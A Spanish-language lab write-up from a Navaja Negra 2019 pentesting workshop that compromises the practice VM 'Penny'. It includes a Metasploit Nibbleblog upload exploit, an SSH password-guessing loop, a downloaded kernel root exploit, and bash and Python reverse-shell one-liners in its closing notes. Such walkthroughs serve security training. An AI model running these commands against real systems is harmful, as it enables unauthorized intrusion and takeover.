Pentesting: Penny
WriteUp Taller Pentestin4Ever Navaja negra 2019 Maquina Penny.
Agradecimientos a Nacho y a los Organizadores de NavajaNegra2019
Indice:
-Arranque y configuracion de la maquina a auditar: Penni
- 1.1.1) Enumeración Puertos: nmap (simple)
- 1.1.2) Enumeración: Puertos2 (nmap opcion -sC)
- Enumeración Puertos: informacion obtenida
- 1.2) Enumeración: Vulnerabilidades1 (nmap -script *vuln*)
- 1.3) Enumeración: Servicios (nma -script enum)
- Enumeración: Vulnerabilidades-Servicios: informacion obtenida
- 1.3.1) Enumeracion: ftp
- 1.3.2) Enumeracion http busqueda directorios
- 1.3.3) Re-Enumeracion http (nibbleblog)
- 2.1) Explotacion nibbleblog: Conseguir Usuario/password
- 2.2) Explotacion nibbleblog: conseguir shell (usando metaexploit)
- 2.3) Explotacion nibbleblog: conseguir shell (sin metaexploit): Averiguar vulnerabilidades nibbleblog
- 2.3) Explotacion ssh: Conseguir Usuario/password (a mano)(sin metaexploit)
-Arranque y configuracion de la maquina a auditar penny en virtualbox
Nota: Configuro la red como adaptador solo anfitrion.
La red de mis VM es 192.168.56.XX(este dato puede ser diferente en tu equipo (ip a |grep global)
em50l@jejo.es$ ip a |grep vbox
inet 192.168.56.1/24 brd 192.168.56.255 scope global vboxnet0
Luego hago un nmap -sn 192.168.56.1/24 o nmap -sn 192.168.56.* a ver que sale:
jejo@em50l:~$ nmap -sn 192.168.56.1/24 -T4 Nmap scan report for 192.168.56.104 Host is up (0.00093s latency).
La ip de la maquina en mi caso es 192.168.56.104
1) Enumeración
1.1.1) Enumeración Puertos: nmap (simple)
jejo@em50l:~$ nmap -n 192.168.56.104 Nmap scan report for 192.168.56.104 PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds
1.1.2) Enumeración: Puertos2 (nmap opcion-sC)
jejo@em50l:~$ nmap -n 192.168.56.104 -sC -p 21,22,80,139,445 Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-07 23:11 CEST Nmap scan report for 192.168.56.104 PORT STATE SERVICE 21/tcp open ftp | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxr-xr-x 2 0 0 4096 Sep 29 18:17 cms | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.56.1 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 5 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh | ssh-hostkey: | 2048 e6:0e:5d:ec:a3:0f:09:1e:bc:a8:11:8f:f5:b7:02:ae (RSA) | 256 bf:cb:b4:ee:b8:91:e8:25:04:00:94:b4:24:34:3f:d1 (ECDSA) |_ 256 57:4a:70:3c:e9:54:2b:61:16:bf:ea:34:c8:52:5b:7b (EdDSA) 80/tcp open http |_http-title: Apache2 Ubuntu Default Page: It works 139/tcp open netbios-ssn 445/tcp open microsoft-ds Host script results: |_clock-skew: mean: -2s, deviation: 0s, median: -2s |_nbstat: NetBIOS name: UBUNTU-16, NetBIOS user:, NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: ubuntu-16 | NetBIOS computer name: UBUNTU-16\x00 | Domain name: 04.3-server-amd64 | FQDN: ubuntu-16.04.3-server-amd64 |_ System time: 2019-10-07T23:11:13+02:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-10-07 23:11:13 |_ start_date: 1600-12-31 23:45:16
Informacion Obtenida:
- 21 Ftp anonimo vsFTPd 3.0.3
- 22 ssh
- 80 Apache2 Ubuntu
- Samba Samba 4.3.11-Ubuntu
- Computer name: ubuntu-16
1.2) Enumeración: Vulnerabilidades1 (nmap -script *vuln*)
jejo@em50l:~$ nmap -n 192.168.56.104 -p 21,22,80,139,445 -script *vuln* Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-08 00:01 CEST Nmap scan report for 192.168.56.104 Host script results: |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: false | smb-vuln-regsvc-dos: | VULNERABLE: | Service regsvc in Microsoft Windows systems vulnerable to denial of service | State: VULNERABLE | The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference | pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes | while working on smb-enum-sessions. |_
Informacion Obtenida:
- regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service
No nos sirve un ataque dos. Luego continuamos.
1.3) Enumeración: Servicios (nmap -script *enum*)
jejo@em50l:~$ nmap -n 192.168.56.104 -p 21,22,80,139,445 -script *enum* Nmap scan report for 192.168.56.104 PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh | ssh2-enum-algos: | kex_algorithms: (6) | curve25519-sha256@libssh.org | ecdh-sha2-nistp256 | ecdh-sha2-nistp384 | ecdh-sha2-nistp521 | diffie-hellman-group-exchange-sha256 | diffie-hellman-group14-sha1 | server_host_key_algorithms: (5) | ssh-rsa | rsa-sha2-512 | rsa-sha2-256 | ecdsa-sha2-nistp256 | ssh-ed25519 | encryption_algorithms: (6) | chacha20-poly1305@openssh.com | aes128-ctr | aes192-ctr | aes256-ctr | aes128-gcm@openssh.com | aes256-gcm@openssh.com | mac_algorithms: (10) | umac-64-etm@openssh.com | umac-128-etm@openssh.com | hmac-sha2-256-etm@openssh.com | hmac-sha2-512-etm@openssh.com | hmac-sha1-etm@openssh.com | umac-64@openssh.com | umac-128@openssh.com | hmac-sha2-256 | hmac-sha2-512 | hmac-sha1 | compression_algorithms: (2) | none |_ zlib@openssh.com 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 08:00:27:E3:86:CA (Oracle VirtualBox virtual NIC) Host script results: |_msrpc-enum: NT_STATUS_OBJECT_NAME_NOT_FOUND | smb-enum-domains: | UBUNTU-16 | Groups: n/a | Users: n/a | Creation time: unknown | Passwords: min length: 5; min age: n/a days; max age: n/a days; history: n/a passwords | Account lockout disabled | Builtin | Groups: n/a | Users: n/a | Creation time: unknown | Passwords: min length: 5; min age: n/a days; max age: n/a days; history: n/a passwords |_ Account lockout disabled | smb-enum-sessions: |_| smb-enum-shares: | account_used: guest | \\192.168.56.104\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (ubuntu-16 server (Samba, Ubuntu)) | Users: 5 | Max Users: | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\192.168.56.104\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: | Path: C:\var\lib\samba\printers | Anonymous access: |_ Current user access: | smb-mbenum: | DFS Root | UBUNTU-16 0.0 ubuntu-16 server (Samba, Ubuntu) | Master Browser | UBUNTU-16 0.0 ubuntu-16 server (Samba, Ubuntu) | Print server | UBUNTU-16 0.0 ubuntu-16 server (Samba, Ubuntu) | Server | UBUNTU-16 0.0 ubuntu-16 server (Samba, Ubuntu) | Server service | UBUNTU-16 0.0 ubuntu-16 server (Samba, Ubuntu) | Unix server | UBUNTU-16 0.0 ubuntu-16 server (Samba, Ubuntu) | Windows NT/2000/XP/2003 server | UBUNTU-16 0.0 ubuntu-16 server (Samba, Ubuntu) | Workstation |_ UBUNTU-16 0.0 ubuntu-16 server (Samba, Ubuntu)
Informacion Obtenida:
- Nada que destacar Luego continuamos.
1.3.1) Enumeracion: ftp
modo manual: timeout 1 cat < /dev/tcp/192.168.56.104/21 / timeout 1 telnet 192.168.56.104 21
em50l@jejo.es$ timeout 1 cat </dev/tcp/192.168.56.104/21 220 (vsFTPd 3.0.3)
Usando nmap: nmap 192.168.56.104 -sC -p 21
jejo@em50l:~$ nmap 192.168.56.104 -sC -p 21 PORT STATE SERVICE 21/tcp open ftp | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxr-xr-x 2 0 0 4096 Sep 29 18:17 cms | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.56.1 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 4 | vsFTPd 3.0.3 - secure, fast, stable |_End of status
vsFTPd 3.0.3 y… !!! Anonymous FTP login allowed!!!
Bien si me conecto al ftp como anonimo: mc ftp://192.168.56.104
Uso el mc (Midnight comander) para navegar mas rapidamente.
Veo un archivo llamado .cmspass.bk
jejo@em50l:~$ curl ftp://192.168.56.104/.cmspass.bk Recordatorio YmlnYmFuZ3RoZW9yeTIwMTg=
Ojo que los intros engañan.
Parece un texto codificado en base64. (Aprenderas a reconocerlos. mayusculas minucuslas sin espacios y terminado en igual)
Veamos que estonde:curl -s ftp://192.168.56.104/.cmspass.bk |base64 -d
jejo@em50l:~$ curl -s ftp://192.168.56.104/.cmspass.bk |base64 -d bigbangtheory2018
Informacion Obtenida: bigbangtheory2018 parece un password.
1.3.1) Posibles exploits vsFTPd searchsploit vsFTPd
root@kali:~# searchsploit vsFTPd
------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------- ----------------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1) | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2) | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | exploits/unix/remote/17491.rb
------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Nada para vsFTPd 3.0.3
1.3.2) Enumeracion http
modo manual: curl -kvs http://192.168.56.104 | grep server
root@kali:/tmp# curl -kvs http://192.168.56.104 | grep server * Connected to 192.168.56.104 (192.168.56.104) port 80 (#0) > GET / HTTP/1.1 > Host: 192.168.56.104 > User-Agent: curl/7.64.0 > Accept: */* > < HTTP/1.1 200 OK < Server: Apache/2.4.18 (Ubuntu) < Last-Modified: Wed, 25 Sep 2019 13:13:24 GMT
1.3.2) Posibles exploits Apache/2.4.18 (Ubuntu)
searchsploit Apache2 2.4
https://duckduckgo.com/html/?q=exploit-db%20apache2%202.4
root@kali:/tmp# searchsploit Apache2 2.4
------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------- ----------------------------------------
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Esc | exploits/linux/local/46676.php
------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Parece que por aqui se puede sacar algo.
Aunque como de momento no puedo colocar archivos php en el servidor no me sirve.
Tendre que probar a usarlo mas adelante.
:( sin resultados :(
1.3.2) Enumeracion http busqueda directorios.
1.3.2a) Enumeracion http metaexploit: scanner/http/dir_scanner (sin resultados)
root@kali:~# msfconsole [-] starting tHe Metasploit Framework console...- msf5 > use auxiliary/scanner/http/dir_scanner msf5 auxiliary(scanner/http/dir_scanner) > set rhosts 192.168.56.104 rhosts => 192.168.56.104 msf5 auxiliary(scanner/http/dir_scanner) > run [*] Detecting error code [*] Using code '404' as not found for 192.168.56.104 [+] Found http://192.168.56.104:80/icons/ 403 (192.168.56.104) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
:( sin resultados :(
1.3.2b) Enumeracion http dirb (sin resultados)
root@kali:~# dirb http://192.168.56.104
DIRB v2.22 By The Dark Raver
-----------------
URL_BASE: http://192.168.56.104/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
GENERATED WORDS: 4612
-----------------
---- Scanning URL: http://192.168.56.104/ ----
+ http://192.168.56.104/index.html (CODE:200|SIZE:11321)
+ http://192.168.56.104/server-status (CODE:403|SIZE:279)
-----------------
END_TIME: Tue Oct 8 17:22:27 2019
DOWNLOADED: 4612 - FOUND: 2
:( sin resultados :(
dirb Usando un diccionario mas extenso. (sin resultados)
root@kali:~# dirb http://192.168.56.104/ /usr/share/dirb/wordlists/big.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Oct 22 16:07:19 2019
URL_BASE: http://192.168.56.104/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://192.168.56.104/ ----
+ http://192.168.56.104/server-status (CODE:403|SIZE:279)
-----------------
END_TIME: Tue Oct 22 16:08:13 2019
DOWNLOADED: 20458 - FOUND: 1
:( sin resultados :(
1.3.2c) Enumeracion http wfuzz (sin resultados)
root@kali:~# wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt --hc 404 "http://192.168.56.104/FUZZ" ******************************************************** * Wfuzz 2.3.4 - The Web Fuzzer * ******************************************************** Target: http://192.168.56.104/FUZZ Total requests: 45463 ================================================================== ID Response Lines Word Chars Payload ================================================================== Total time: 87.05434 Processed Requests: 45463 Filtered Requests: 45463 Requests/sec.: 522.2369
:( sin resultados :(
1.3.2d) Enumeracion http wfuzz superbestia (combinando 2 palabras) !!!Por fin encuentro algo¡¡¡
root@kali: ~# wfuzz -c -s 0.01 -w /usr/share/wfuzz/wordlist/general/megabeast.txt -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 "http://192.168.56.104/FUZZFUZ2Z" ******************************************************** * Wfuzz 2.3.4 - The Web Fuzzer * ******************************************************** Target: http://192.168.56.104/FUZZFUZ2Z Total requests: 43189850 ================================================================== ID Response Lines Word Chars Payload ================================================================== 21049726: C=301 9 L 28 W 321 Ch "nibble-blog"
Por fin encuentro algo: nibbleblog
http://192.168.56.104/nibbleblog Aunque ha tardado demasiado (mas de 24h)
1.3.3) Re-Enumeracion http (nibbleblog)
Una vez encontrada una direccion busco de nuevo:
root@kali:~# wfuzz -c -w /usr/share/wfuzz/wordlist/general/admin-panels.txt --hc 404 "http://192.168.56.104/nibbleblog/FUZZ" ******************************************************** * Wfuzz 2.3.4 - The Web Fuzzer * ******************************************************** Target: http://192.168.56.104/nibbleblog/FUZZ Total requests: 137 ================================================================== ID Response Lines Word Chars Payload ================================================================== 000001: C=200 26 L 94 W 1410 Ch "admin.php" 000002: C=200 22 L 126 W 2130 Ch "admin/"
En este caso creo que dirb me da informacion mas clara.
root@kali:~# dirb http://192.168.56.104/nibbleblog /usr/share/dirb/wordlists/big.txt
DIRB v2.22
By The Dark Raver
-----------------
URL_BASE: http://192.168.56.104/nibbleblog/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt
GENERATED WORDS: 20458
-----------------
---- Scanning URL: http://192.168.56.104/nibbleblog/ ----
+ http://192.168.56.104/nibbleblog/README (CODE:200|SIZE:4628)
==> DIRECTORY: http://192.168.56.104/nibbleblog/admin/
==> DIRECTORY: http://192.168.56.104/nibbleblog/content/
==> DIRECTORY: http://192.168.56.104/nibbleblog/languages/
==> DIRECTORY: http://192.168.56.104/nibbleblog/plugins/
==> DIRECTORY: http://192.168.56.104/nibbleblog/themes/
---- Entering directory: http://192.168.56.104/nibbleblog/admin/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
---- Entering directory: http://192.168.56.104/nibbleblog/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
---- Entering directory: http://192.168.56.104/nibbleblog/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
---- Entering directory: http://192.168.56.104/nibbleblog/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.104/nibbleblog/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Fri Oct 11 01:37:18 2019
DOWNLOADED: 20458 - FOUND: 1
root@kali:~# wfuzz -c -s 0.01 -w /usr/share/wfuzz/wordlist/general/common.txt -w /usr/share/wfuzz/wordlist/general/extensions_common.txt --hc 404 "http://192.168.56.104/nibbleblog/FUZZFUZ2Z" Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 2.3.4 - The Web Fuzzer * ******************************************************** Target: http://192.168.56.104/nibbleblog/FUZZFUZ2Z Total requests: 26600 ================================================================== ID Response Lines Word Chars Payload ================================================================== 001671: C=200 26 L 94 W 1410 Ch "admin - .php" 001680: C=200 22 L 126 W 2130 Ch "admin - /" 006328: C=200 18 L 82 W 1356 Ch "content - /" 012255: C=200 182 L 765 W 9693 Ch "index - .php" 012591: C=200 0 L 11 W 78 Ch "install - .php" 021551: C=200 18 L 21 W 688 Ch "sitemap - .php" 024183: C=200 87 L 175 W 1628 Ch "update - .php" Total time: 317.1319 Processed Requests: 26600 Filtered Requests: 26593 Requests/sec.: 83.87675
2) Explotacion
2.1) Explotacion nibbleblog: Conseguir Usuario/password
Ojeando la estructura de directorios me encuentro: http://192.168.56.104/nibbleblog/content/private/users.xml Y aqui encuentro que un usuario es: penny Recordar que un posible password era bigbangtheory2018
Otras url interesantes:
http://192.168.56.104/nibbleblog/content/private/config.xml
http://192.168.56.104/nibbleblog/content/public/upload/
http://192.168.56.104/nibbleblog/update.php
Consigo info de la version: Nibbleblog 4.0.3 Coffee
Al final despues de varias pruebas el usuario es penny y OrgulloFriki
2.2) Explotacion nibbleblog: conseguir shell (usando metaexploit)
-Arrancar consola msfconsole
-Buscar exploits search nibbleblog
msf5 > search nibbleblog Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 1 exploit/multi/http/nibbleblog_file_upload 2015-09-01 excellent Yes Nibbleblog File Upload Vulnerability
-Cargar exploit use exploit/multi/http/nibbleblog_file_upload
-Mostrar opciones show options
msf5 > use exploit/multi/http/nibbleblog_file_upload msf5 exploit(multi/http/nibbleblog_file_upload) > show options Module options (exploit/multi/http/nibbleblog_file_upload): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD yes The password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target address range or CIDR identifier RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the web application USERNAME yes The username to authenticate with VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Nibbleblog 4.0.3
-Parametrizar exploit
msf5 exploit(multi/http/nibbleblog_file_upload) > set rhosts 192.168.56.104 msf5 exploit(multi/http/nibbleblog_file_upload) > set targeturi nibbleblog msf5 exploit(multi/http/nibbleblog_file_upload) > set username penny msf5 exploit(multi/http/nibbleblog_file_upload) > set password OrgulloFriki msf5 exploit(multi/http/nibbleblog_file_upload) > set lhost 192.168.56.105 msf5 exploit(multi/http/nibbleblog_file_upload) >
-lanzar y conseguir meterpreter
msf5 exploit(multi/http/nibbleblog_file_upload) > run [*] Started reverse TCP handler on 192.168.56.105:4444 [*] Sending stage (38247 bytes) to 192.168.56.104 [*] Meterpreter session 1 opened (192.168.56.105:4444 -> 192.168.56.104:52336) at 2019-10-23 16:59:07 -0400 [+] Deleted image.php meterpreter > meterpreter > sysinfo Computer : ubuntu-16 OS : Linux ubuntu-16 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 Meterpreter : php/linux
-lanzar un shell un poco mas completo desde meterpreter
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
meterpreter > shell
Process 2477 created.
Channel 2 created.
python -c 'import pty;pty.spawn("/bin/bash")'
</html/nibbleblog/content/private/plugins/my_image$
2.3) Explotacion: nibbleblog: conseguir shell (sin metaexploit): Averiguar vulnerabilidades nibbleblog
Entrando al blog como penny en configuracion veo que es un:
Nibbleblog 4.0.3 “Coffee”
Buscando en internet: Nibbleblog 4.0.3 vuln :
https://duckduckgo.com/html?q=Nibbleblog%204.0.3%20vuln
Aparece un articulo en el que comentan la vilnerabilidad: CVE-2015-6967
https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html
http://192.168.56.104/nibbleblog/content/private/plugins/my_image/image.php?cmd=id
Por completar:
2.4) Explotacion ssh: Conseguir Usuario/password (a mano jaja)
Suponemos que el usuario es penny y el password es una palabra de la pagina web.
Creo un diccioario con los datos de la web
cewl http://192.168.56.104/nibbleblog/ > diccionario_nibbleblog.txt
hago ssh y pruebo como password las palabras del diccionario
root@kali:~cat ./diccionario_nibbleblog.txt | while read pass ; do ( echo $pass ; sshpass -p $pass ssh -q penny@192.168.56.104 ); done Big Bang Theory Sheldon Penny divertidos Leonard Series Geek OrgulloFriki Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-87-generic x86_64)
Como se puede ver el password es OrgulloFriki`
Para mas info ver notas-varias
3) Escalada de privilegios.
3.1) Vulnerabilidades Kernel Linux.
- Enumero el kernel:
uname -a
Linux ubuntu-16 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
penny@ubuntu-16:/tmp$ uname -a Linux ubuntu-16 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
Busco exploits:
exploit-db Linux ubuntu-16 4.4
https://duckduckgo.com/html/?q=exploit-db%20Linux%20ubuntu-16%204.4Compilo exploit:
Me descargo el codigowget https://www.exploit-db.com/exploits/44298
Preparo archivo.c:nano exploitKernel.c
compilador gcc en la maquina destino???gcc:( !!! hooo NO tiene compilador!!!
Compilo codigogcc exploitKernel.cojo si la maquina es distinta tienes que hacer una compilacion cruzada.Copio exploit a destino:
sshpass -p 'OrgulloFriki' scp ./a.out penny@192.168.56.104:/tmp/ejecuto exploit:
chmod +x /tmp/a.out ; /tmp/a.out
penny@ubuntu-16:~$ chmod +x /tmp/a.out ; /tmp/a.out task_struct = ffff880004e00000 uidptr = ffff88002b368904 spawning root shell root@ubuntu-16:~# root@ubuntu-16:~# id uid=0(root) gid=0(root) grupos=0(root),1001(penny)
Conseguido Acceso root.
!!!here is the flag¡¡¡
root@ubuntu-16:~# cat /root/root.txt ##################################################### Oh yeah! you got to be root!! Congralutations Training Pentesting4ever - Navaja Negra 9ed #####################################################
3.2) Vulnerabilidades Kernel Linux. (searchexploit)
- Enumero el kernel:
uname -a
penny@ubuntu-16:/tmp$ uname -m x86_64 penny@ubuntu-16:/tmp$ uname -a Linux ubuntu-16 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
- Busco exploits:
searchsploit ubuntu 16 4.4.0
root@kali:/tmp# searchsploit ubuntu 16 4.4.0
------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Pr | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Boun | exploits/linux_x86-64/local/40049.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | exploits/linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local P | exploits/linux/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Es | exploits/linux/local/43418.c
------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
- Compilo exploit:
root@kali:/tmp# uname -m i686 root@kali:/tmp# gcc -v Using built-in specs. COLLECT_GCC=gcc COLLECT_LTO_WRAPPER=/usr/lib/gcc/i686-linux-gnu/8/lto-wrapper Target: i686-linux-gnu
Esto es un problema. la kali no me sirve para compilar este exploit.
Tengo que hacer una compilacion cruzada.
** ;( sin resultados ;( **
3.3) mysql. (sin resultados)
Que no vea desde fuera el puerto mysql.
no es indicativo de que no tenga mysql.
penny@ubuntu-16:/tmp$ mysql --version mysql Ver 14.14 Distrib 5.7.27, for Linux (x86_64) using EditLine wrapper
root@kali:/tmp# searchsploit mysql 5.7
------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------- ----------------------------------------
MySQL / MariaDB / PerconaDB 5.5.51/5.6.32/5.7.14 - Code Execution / Privilege | exploits/linux/local/40360.txt
MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege | exploits/linux/local/40678.c
MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' System User Privilege E | exploits/linux/local/40679.sh
MySQL < 5.6.35 / < 5.7.17 - Integer Overflow | exploits/multiple/dos/41954.py
------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:/tmp# scp /usr/share/exploitdb/exploits/linux/local/40679.sh penny@192.168.56.104:/tmp/ penny@192.168.56.104's password: 40679.sh 100% 6303 40.8KB/s 00:00
https://duckduckgo.com/html/?q=exploit-db%20mysql%205.7%20Privilege https://www.exploit-db.com/exploits/40679
penny@ubuntu-16:/tmp$ ./exploit_mysql.bash /var/log/mysql/error.log MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit mysql-chowned.sh (ver. 1.0) CVE-2016-6664 / OCVE-2016-5617 Discovered and coded by: Dawid Golunski http://legalhackers.com [+] Starting the exploit as uid=1001(penny) gid=1001(penny) grupos=1001(penny) [!] You need to execute the exploit as mysql user! Exiting.
** ;( sin resultados ;( **
3.4) http Posibles exploits Apache/2.4.18 (sin resultados)
Subo el php del exploit exploits/linux/local/46676.php encontrado anteriormente.
y lanzo la url:
http://192.168.56.104/nibbleblog/content/private/plugins/my_image/image.php?cmd=id
me devuelve :
CARPE (DIEM) ~ CVE-2019-0211 The following addresses were not determined by parsing /proc/self/maps: shm, apache
** ;( sin resultados ;( **
3.2) Otros metodos.
Notas Varias:
Shell inverso (reverse shell)
Aqui teneis una estupenda chuleta de shells inversos: https://highon.coffee/blog/reverse-shell-cheat-sheet/
Provemos con un bash shell:
-Maquina a controlar: bash -i >& /dev/tcp/192.168.56.105/80 0>&1
-Maquina control: nc -nvlp 80
Ejemplo:
-Maquina Origen (kali) (ip a |grep global) ; nc -nvlp 80
root@kali:~# (ip a |grep global) ; nc -nvlp 80
inet 192.168.56.105/24 brd 192.168.56.255 scope global dynamic noprefixroute eth0
listening on [any] 80 ...
La maquina se queda a la espera de una conexion entrante.
y en cuanto ejecute bash -i >& /dev/tcp/192.168.56.105/80 0>&1 en la maquina destino.
se realizara una conexion veremos esto:
connect to [192.168.56.105] from (UNKNOWN) [192.168.56.104] 54726 penny@ubuntu-16:/tmp$
Que significara que ya tengo acceso a la maquina destino.
Copiar un archivo usando netcat:
-Maquina Origen: nc -w 3 ip.dest 1234 < LinEnum.sh
-Maquina Destino: nc -l -p 1234 > LinEnum.sh
Copiar un archivo por http:
-Maquina Origen: python3 -m http.server
-Maquina Destino: wget http://192.168.56.105/LinEnum.sh
Ejemplo:
-Maquina Origen (kali): (ip a |grep global) ; python3 -m http.server
root@kali:~# (ip a |grep global) ; python3 -m http.server inet 192.168.56.105/24 brd 192.168.56.255 scope global dynamic noprefixroute eth0 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 192.168.56.104 - - [26/Oct/2019 11:15:21] "GET /LinEnum.sh HTTP/1.1" 200 -
-Maquina Destino (Penny): wget http://192.168.56.105:8000/LinEnum.sh
penny@ubuntu-16:/tmp$ wget http://192.168.56.105:8000/LinEnum.sh --2019-10-26 11:15:18-- http://192.168.56.105:8000/LinEnum.sh Conectando con 192.168.56.105:8000... conectado. Petición HTTP enviada, esperando respuesta... 200 OK Longitud: 46108 (45K) [text/x-sh] Grabando a: “LinEnum.sh” LinEnum.sh 100%[================>] 45,03K --.-KB/s in 0,001s 2019-10-26 11:15:18 (86,7 MB/s) - “LinEnum.sh” guardado [46108/46108]
Copiar un archivo por ssh:
sshpass -p 'OrgulloFriki' scp ./a.out penny@192.168.56.104:/tmp/
Shell por ipv6:
-Maquina a controlar:
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("fe80::a00:27ff:fe2e:19d0%enp0s3",1234,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
- Donde: (parametros que tendras que modificar)
- ip6 de la maquina control: fe80::a00:27ff:fe2e:19d0
- interfaz de red por el que salir. enp0s3
- puerto esquecha de la maquina control 1234
-Maquina control: socat - tcp6-listen:1234
Acceso ssh (reutilizacion de contraseñas)
Listando /home veo que el sistema tambien tiene un usuario penny asi que voy a intentar acceder por ssh:
Con sshpass -p 'OrgulloFriki' ssh penny@192.168.56.104
Deberia poder entrar en el sistema como un usuario con un shell completo.
crear un diccionario con los datos de una pagina web.
cewl http://192.168.56.104/nibbleblog/ > diccionario_nibbleblog.txt
Utilizar palabras de un dicionario en un bucle.
cat /tmp/diccionario_nibbleblog.txt | while read pass ; do ( echo $pass); done
cat ./diccionario_nibbleblog.txt | while read pass ; do ( \
echo $pass ; sshpass -p $pass ssh -q penny@192.168.56.104 \
); done
LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
( cd /tmp ; bash ./LinEnum.sh -r penny -e /tmp/ &)&
linuxprivchecker (sin resultado)
